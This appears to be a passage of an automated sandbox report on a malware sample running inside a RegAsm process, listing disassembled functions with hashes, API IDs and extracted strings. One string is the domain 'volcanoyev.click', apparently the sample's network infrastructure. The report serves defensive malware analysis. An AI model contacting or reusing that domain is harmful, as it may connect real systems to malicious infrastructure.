                                                            Function 004329C0 Relevance: 9.1, APIs: 6, Instructions: 144clipboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                            • String ID:
                                                            • API String ID: 1006321803-0
                                                            • Opcode ID: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
                                                            • Instruction ID: f2decc6a1db23371b8bb2cc1877cdad688787675f84f74fde2292b1bd35bf902
                                                            • Opcode Fuzzy Hash: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
                                                            • Instruction Fuzzy Hash: 855102F1D08A828FD700AF78C54936EFFA0AB15310F04863ED89597392D3BCA9598797
                                                            Function 00408F50 Relevance: 9.0, Strings: 7, Instructions: 223COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ($jqci$wkw6$x|j~$ye{|$z/6q$|$Nb
                                                            • API String ID: 0-2309992716
                                                            • Opcode ID: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                                            • Instruction ID: 26eceaee55227743b306782b87e7b3b011f3ad886b5b359efa5fd428808e0ec2
                                                            • Opcode Fuzzy Hash: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                                            • Instruction Fuzzy Hash: F661F37164D3C68AD3118F3988A076BFFE09FA3310F18497EE4D05B382D7798A09975A
                                                            Function 00409580 Relevance: 7.9, Strings: 6, Instructions: 442COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: #4<7$+8=>$PK$Tiec$\$r
                                                            • API String ID: 0-1906979145
                                                            • Opcode ID: 8a87d060594a504fb9fb2c8fb36e58836b617313b2e0b34c62a439b04e6c237f
                                                            • Instruction ID: 6053270823643479f5a9008bd7dab94ee1cb24749ea6a1c2bb59c6b2eb0b3cac
                                                            • Opcode Fuzzy Hash: 8a87d060594a504fb9fb2c8fb36e58836b617313b2e0b34c62a439b04e6c237f
                                                            • Instruction Fuzzy Hash: 29D12476A087409BD318CF35C85166BBBE2EBD1318F18893DE5E69B391D738C905CB46
                                                            Function 0041E7C0 Relevance: 5.8, Strings: 4, Instructions: 779COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: "$-+$/$hI
                                                            • API String ID: 0-2772680581
                                                            • Opcode ID: 409baa93764c372ff58d36d41dba2cd8c3d99c0b7ed760c369768b2520c3b364
                                                            • Instruction ID: 80b5f3405da4d7e7bc2228bbbe7299cc3933a4313a4431d55bf3dd64750ae482
                                                            • Opcode Fuzzy Hash: 409baa93764c372ff58d36d41dba2cd8c3d99c0b7ed760c369768b2520c3b364
                                                            • Instruction Fuzzy Hash: 6442387850C3818FC725CF25C8506AFBBE1AF85314F044A6EE8D85B392D739D94ACB5A
                                                            Function 0042CA49 Relevance: 5.3, Strings: 4, Instructions: 302COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ,JHj$Hs$bc$v
                                                            • API String ID: 0-909542228
                                                            • Opcode ID: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
                                                            • Instruction ID: f210d87f6d5865ed1c617f00c3be5d3d578c02e4f21426ae5baa12ce733d6edf
                                                            • Opcode Fuzzy Hash: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
                                                            • Instruction Fuzzy Hash: C0919E71A1C3A08BE3358F3594517AFBBD2AFD3314F58896EC4C99B382C6794405CB96
                                                            Function 0042CB22 Relevance: 5.3, Strings: 4, Instructions: 299COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ,JHj$Hs$bc$v
                                                            • API String ID: 0-909542228
                                                            • Opcode ID: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
                                                            • Instruction ID: ba8baf3debfb1281f5f3a9f4bb7f36b3e217b7d4f704efc08a24ef2861aa601e
                                                            • Opcode Fuzzy Hash: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
                                                            • Instruction Fuzzy Hash: FA916D71A1C3A08BE3358F3594917AFBBD2AFD3314F58896DC4C94B382CA794405CB96
                                                            Function 0042CAD0 Relevance: 5.3, Strings: 4, Instructions: 295COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ,JHj$Hs$bc$v
                                                            • API String ID: 0-909542228
                                                            • Opcode ID: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                                            • Instruction ID: f1dd0e060a49988aa5914a4bcfde423beaa814ce8563699fb3410ac54fff71cf
                                                            • Opcode Fuzzy Hash: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                                            • Instruction Fuzzy Hash: 89918E71A1C3A08BE3358F3594517ABBFD2AFD3314F58896EC4C99B382C6794405CB96
                                                            Function 0042CB11 Relevance: 5.3, Strings: 4, Instructions: 271COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ,JHj$Hs$bc$v
                                                            • API String ID: 0-909542228
                                                            • Opcode ID: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                                            • Instruction ID: 1e9c0ee7827ae846e03c62aab54aec301621c39cdfcdcbd3b33c3bf2ddd67d6a
                                                            • Opcode Fuzzy Hash: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                                            • Instruction Fuzzy Hash: 4B814871A1C3A08BE3358F3994517ABBFD2AFE3314F59896DC4C94B386C6784409CB96
                                                            Function 00417DEE Relevance: 4.7, Strings: 3, Instructions: 998COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID: ,$i$r}A
                                                            • API String ID: 2994545307-2114006112
                                                            • Opcode ID: 0e4b36d0337e01a9c7c8ce5630e9dd0ade0f1867cda4b4963c273f19514711e6
                                                            • Instruction ID: 71abf614919c99122684cd8b50d12f0618c33dd175a6392faed4f31dbac36a6d
                                                            • Opcode Fuzzy Hash: 0e4b36d0337e01a9c7c8ce5630e9dd0ade0f1867cda4b4963c273f19514711e6
                                                            • Instruction Fuzzy Hash: 90427976A087508FD324CF69D8807ABBBE2EB96300F1D492ED4D5A7352C7389845C796
                                                            Function 0041759F Relevance: 4.4, Strings: 3, Instructions: 671COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: gfff$i$r}A
                                                            • API String ID: 0-3931832132
                                                            • Opcode ID: 63d4f06d283b13aa9aabc31ef275959d287b6dadcbde27f9351af1790c00577d
                                                            • Instruction ID: 86030a502c6fbeff1aeb5632b982c99bae1c365f88ce42af9c09e5b1275022bd
                                                            • Opcode Fuzzy Hash: 63d4f06d283b13aa9aabc31ef275959d287b6dadcbde27f9351af1790c00577d
                                                            • Instruction Fuzzy Hash: 74028A76A483118BD724CF28D8817ABBBE2EBD2300F19852ED4C5D7392DB389945C786
                                                            Function 0041D380 Relevance: 4.2, Strings: 3, Instructions: 453COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 34$C]$|F
                                                            • API String ID: 0-2804560523
                                                            • Opcode ID: 7bec5bc3369f6adcf9dfe2aa521af371a2ac693f70b7f14cbe9fa8a8d0a997b9
                                                            • Instruction ID: 2c432fa7c5999ab476cb5019d0599193357fe59285c965ab9162d9f100ef16a5
                                                            • Opcode Fuzzy Hash: 7bec5bc3369f6adcf9dfe2aa521af371a2ac693f70b7f14cbe9fa8a8d0a997b9
                                                            • Instruction Fuzzy Hash: E2C1F1B59183118BC720CF28C8816ABB3F2FFD5314F58895DE8D58B390E778A945C79A
                                                            Function 0042DFE9 Relevance: 4.1, Strings: 3, Instructions: 332COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Ef$TQ][$sWK)
                                                            • API String ID: 0-3401374238
                                                            • Opcode ID: 2018eb1ddcc6c4d2b6b82b9d22d54321858e2bd23606dd915e7f156b5046d053
                                                            • Instruction ID: 19a0c778187f2748ae17dd07c5e08606c1358576a23e797e2c0b4f31c76305c1
                                                            • Opcode Fuzzy Hash: 2018eb1ddcc6c4d2b6b82b9d22d54321858e2bd23606dd915e7f156b5046d053
                                                            • Instruction Fuzzy Hash: CBB1C33061C3E08ED7398F2994507ABBBE09F97304F48499DD4D95B382DB79850ACBA7
                                                            Function 0041B2E0 Relevance: 4.0, Strings: 3, Instructions: 231COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: +|-~$/pqr$_
                                                            • API String ID: 0-1379640984
                                                            • Opcode ID: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
                                                            • Instruction ID: 042a524babaaaf1240c13a88dd3a117b8cd22f0ed9ec4b151ea40a3d869026f8
                                                            • Opcode Fuzzy Hash: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
                                                            • Instruction Fuzzy Hash: D9810A5561495006DB2CDF3489A333BAAD79F84308B2991BFC995CFBABE93CC502874D
                                                            Function 0040DBD9 Relevance: 3.0, Strings: 2, Instructions: 528COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Dx$volcanoyev.click
                                                            • API String ID: 0-2198749068
                                                            • Opcode ID: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
                                                            • Instruction ID: 5bb1130f72a98c6f233d2c217a903bc57bb56de3339a3108bfc93ec34e4a158e
                                                            • Opcode Fuzzy Hash: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
                                                            • Instruction Fuzzy Hash: A1F1CDB054C3D18ED335CF6594907EBBBE0EB92314F144AAEC8D96B382C735090A8B97
                                                            Function 0042DA53 Relevance: 2.9, Strings: 2, Instructions: 440COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 0K)$4*VP
                                                            • API String ID: 0-3626284114
                                                            • Opcode ID: 7f9184ee53db8657b7211f9213731764c2e24f7097ca2d92dc8b3e88ab6ab3dd
                                                            • Instruction ID: 79d6e082e0491a4045e5b840a95bb4df230d34c241beba690eb3c8ed7007ce5a
                                                            • Opcode Fuzzy Hash: 7f9184ee53db8657b7211f9213731764c2e24f7097ca2d92dc8b3e88ab6ab3dd
                                                            • Instruction Fuzzy Hash: 8FD12730A1C3D08ED7258F3994507ABBFE19FA7314F59896ED4C98B382C7798406CB66
                                                            Function 004179C1 Relevance: 2.8, Strings: 2, Instructions: 327COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID: i$r}A
                                                            • API String ID: 2994545307-2976846027
                                                            • Opcode ID: 216b221475836e3855d1b8759aff26348fc53bb82e04dccbb46422255a771982
                                                            • Instruction ID: bf893d2c0726f4e317e2b51d5e32a95bc91f637e65c50f94937d3483e244f6d9
                                                            • Opcode Fuzzy Hash: 216b221475836e3855d1b8759aff26348fc53bb82e04dccbb46422255a771982
                                                            • Instruction Fuzzy Hash: 4781A83694C351CFD710CF68D8806ABBBE2EBD2300F18496ED8D697252C7389985C7CA
                                                            Function 00418591 Relevance: 2.6, Strings: 2, Instructions: 115COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: P<?$P<?
                                                            • API String ID: 0-3449142988
                                                            • Opcode ID: 15a1e53f96b5dbffac6245dad95bb33219b4ef4f3549f5551b78542ea9aaefbe
                                                            • Instruction ID: 58e7122ac3cea56caf2700395258951e32a9ff530ffc896d1714b79e34f88e6e
                                                            • Opcode Fuzzy Hash: 15a1e53f96b5dbffac6245dad95bb33219b4ef4f3549f5551b78542ea9aaefbe
                                                            • Instruction Fuzzy Hash: 64312976A44310EFD7208F54C880BBBB7A6F789300F58D92ED5C9A3251DB745C84879B
                                                            Function 0043B1D0 Relevance: 1.9, Strings: 1, Instructions: 653COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID: f
                                                            • API String ID: 2994545307-1993550816
                                                            • Opcode ID: 8e9e50587fb6b78e0fa4282dd31e32de0d85a4e7deb78124e5aaaf4c71ac60a2
                                                            • Instruction ID: 18f220f42ed12d3f8706e230857eda4cfb4a422739cf4bd3cfbe98504a66e541
                                                            • Opcode Fuzzy Hash: 8e9e50587fb6b78e0fa4282dd31e32de0d85a4e7deb78124e5aaaf4c71ac60a2
                                                            • Instruction Fuzzy Hash: 8512D3706083418FD715CF28C88176FB7E5EB89314F289A2EE6E597392D734DC058B9A
                                                            Function 00425E30 Relevance: 1.7, Strings: 1, Instructions: 431COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: {}
                                                            • API String ID: 0-4269290415
                                                            • Opcode ID: ae2110e227aeaa4557827879407c3dbec5839db0e2fe540aba91c9e8bccdbcdd
                                                            • Instruction ID: 0af4e1219fe889d167e9da05173529857e0f89c87775fbd0e3160429af4db955
                                                            • Opcode Fuzzy Hash: ae2110e227aeaa4557827879407c3dbec5839db0e2fe540aba91c9e8bccdbcdd
                                                            • Instruction Fuzzy Hash: 82E101B5608340DFE724DF24E88176FB7B2FB85304F54893DE5859B2A2DB789805CB4A
                                                            Function 00438810 Relevance: 1.7, Strings: 1, Instructions: 426COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID: /,-
                                                            • API String ID: 2994545307-1700940157
                                                            • Opcode ID: e68cf86ee166e556bd12f2f12a5a46f9bc2d0c12cb890ba0df125163a2fef21b
                                                            • Instruction ID: 73ea5f1ed436ac76404857fefd2ddfa4c8367646346d3918638d2e9e73e3d7e7
                                                            • Opcode Fuzzy Hash: e68cf86ee166e556bd12f2f12a5a46f9bc2d0c12cb890ba0df125163a2fef21b
                                                            • Instruction Fuzzy Hash: 8EB18E717083014BD714DF25888163BF792EBCA314F14A92EF5D557392DB39EC068B9A
                                                            Function 00416263 Relevance: 1.7, Strings: 1, Instructions: 405COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID: VtA
                                                            • API String ID: 2994545307-3724035812
                                                            • Opcode ID: e8c9bba709d658e790e2a6ad064546b7b8b5661d45e7256e4bece47e75e6f2c0
                                                            • Instruction ID: ed71193d6b2bdbbac52031f97d74cd30495a87e66650ae04c888d17f76a05038
                                                            • Opcode Fuzzy Hash: e8c9bba709d658e790e2a6ad064546b7b8b5661d45e7256e4bece47e75e6f2c0
                                                            • Instruction Fuzzy Hash: 5DC139766083419FD714CF28D8817AFB7E2AB95310F09892EE4D5D7392C738D885C75A
                                                            Function 0042B170 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: "
                                                            • API String ID: 0-123907689
                                                            • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                            • Instruction ID: 33b1f2780e14060464d7ed180fcf8b3e4403934f6fcecc96c03af05ff21b71f5
                                                            • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                            • Instruction Fuzzy Hash: 4A71D732B083358BD714CE28E48432FB7E2EBC5750FA9856EE89497351D7389C4587CA
                                                            Function 0041D83A Relevance: 1.5, Strings: 1, Instructions: 224COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: klm
                                                            • API String ID: 0-3800403225
                                                            • Opcode ID: d5319d95fe68aebd98aaca92b9825a3df1dae6eff9af15c4fe87a1423c5b3b77
                                                            • Instruction ID: fbab8d391cb70804594fb2969dbf4b57704b04da195ac2ac4d1ccbe35a174314
                                                            • Opcode Fuzzy Hash: d5319d95fe68aebd98aaca92b9825a3df1dae6eff9af15c4fe87a1423c5b3b77
                                                            • Instruction Fuzzy Hash: 9751F3B4A0D3508BD314EF25D81276BB7F2EFA6348F18856EE4D54B391E7398501CB1A
                                                            Function 00417380 Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID: ?^A
                                                            • API String ID: 2994545307-4120214115
                                                            • Opcode ID: 2c308a6fbd29e83612078340da99c3c212b60cd104204cd4e1c6453a1b582895
                                                            • Instruction ID: 9ee6d34e9011fc7addbd5ae762574014bc539ca284b22a695acd6cfcc742d02e
                                                            • Opcode Fuzzy Hash: 2c308a6fbd29e83612078340da99c3c212b60cd104204cd4e1c6453a1b582895
                                                            • Instruction Fuzzy Hash: 2141783A648300DFE3248B94D880ABBBBA3B7D5310F5D552EC5C527222CB745C81878F
                                                            Function 00428B61 Relevance: 1.4, Strings: 1, Instructions: 142COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $%
                                                            • API String ID: 0-4214564638
                                                            • Opcode ID: d78bc3d5ce02b10deb2a392cf77ba543051be3d806e39ea4f7dd24e4e80accd5
                                                            • Instruction ID: 3a12058a654eb28ab9a6ec9325260f0da8ac6e7581b620ea067b04d8af41a39e
                                                            • Opcode Fuzzy Hash: d78bc3d5ce02b10deb2a392cf77ba543051be3d806e39ea4f7dd24e4e80accd5
                                                            • Instruction Fuzzy Hash: 694124B0E022298BCB10CF99E8513AEB7B1FF55310F09825DE441AB790E7785941CB64
                                                            Function 0040B70C Relevance: 1.3, Strings: 1, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: o`
                                                            • API String ID: 0-3993896143
                                                            • Opcode ID: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
                                                            • Instruction ID: 0bdba0f6bf2b5cd18ae264ba298f37260da84434396a298b3053f459174327b1
                                                            • Opcode Fuzzy Hash: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
                                                            • Instruction Fuzzy Hash: 9C11C270218340AFC310DF65DDC1B6BBFE2DBC2204F65983DE185A72A1C675E9499719
                                                            Function 0041682D Relevance: .8, Instructions: 761COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0417c610e5770e3de08e3f27a6132ce354b413bedc9eba632381f23ebbae40da
                                                            • Instruction ID: 1dcbf6391fd41f0c0a817e27e8bafbe762063cd3c7318eef4161125519cd5594
                                                            • Opcode Fuzzy Hash: 0417c610e5770e3de08e3f27a6132ce354b413bedc9eba632381f23ebbae40da
                                                            • Instruction Fuzzy Hash: 57424876A083518BD724CF29C8917ABB7E2EFC5310F19892EE4C597351DB38D845CB8A
                                                            Function 004074F0 Relevance: .6, Instructions: 611COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 83213a2729f592a7edcd98fc7886bfd8d55118cdf426f5e19ae94b324be42bba
                                                            • Instruction ID: 7b72874d185f9504f09fa30b763c2e13130ca022e31a023e0d3144396e745bed
                                                            • Opcode Fuzzy Hash: 83213a2729f592a7edcd98fc7886bfd8d55118cdf426f5e19ae94b324be42bba
                                                            • Instruction Fuzzy Hash: 1012A372A0C7118BD725DE18D8806ABB3E1BFC4315F19893ED986A7385D738B8518B87
                                                            Function 004197C2 Relevance: .6, Instructions: 596COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7d4a608daa09243b0b1664d6ac314f1ff4fa7c4c8c111b79aec593db6438873e
                                                            • Instruction ID: ba4386b7c12eba82c1b0c1a845e92ae21c1426ac82d7aa641ba094e7d1c8bfda
                                                            • Opcode Fuzzy Hash: 7d4a608daa09243b0b1664d6ac314f1ff4fa7c4c8c111b79aec593db6438873e
                                                            • Instruction Fuzzy Hash: FE021671A083128BC724CF28C4A16ABB7F1EFE5350F19852DE8C99B351E7389D85C786
                                                            Function 004291DD Relevance: .5, Instructions: 549COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2253fead0949c94e28b23ae243de764efe372f7ce01ce19a162629ea64ece33e
                                                            • Instruction ID: 8cc232c379ab24ad0e8e110b9e0577a2d66b898ca13c535210c4519ca42de900
                                                            • Opcode Fuzzy Hash: 2253fead0949c94e28b23ae243de764efe372f7ce01ce19a162629ea64ece33e
                                                            • Instruction Fuzzy Hash: ACF12771E003258BCF24CF58C8516ABB7B2FF95314F198199D896AF355E7389C41CB94
                                                            Function 00405990 Relevance: .4, Instructions: 448COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
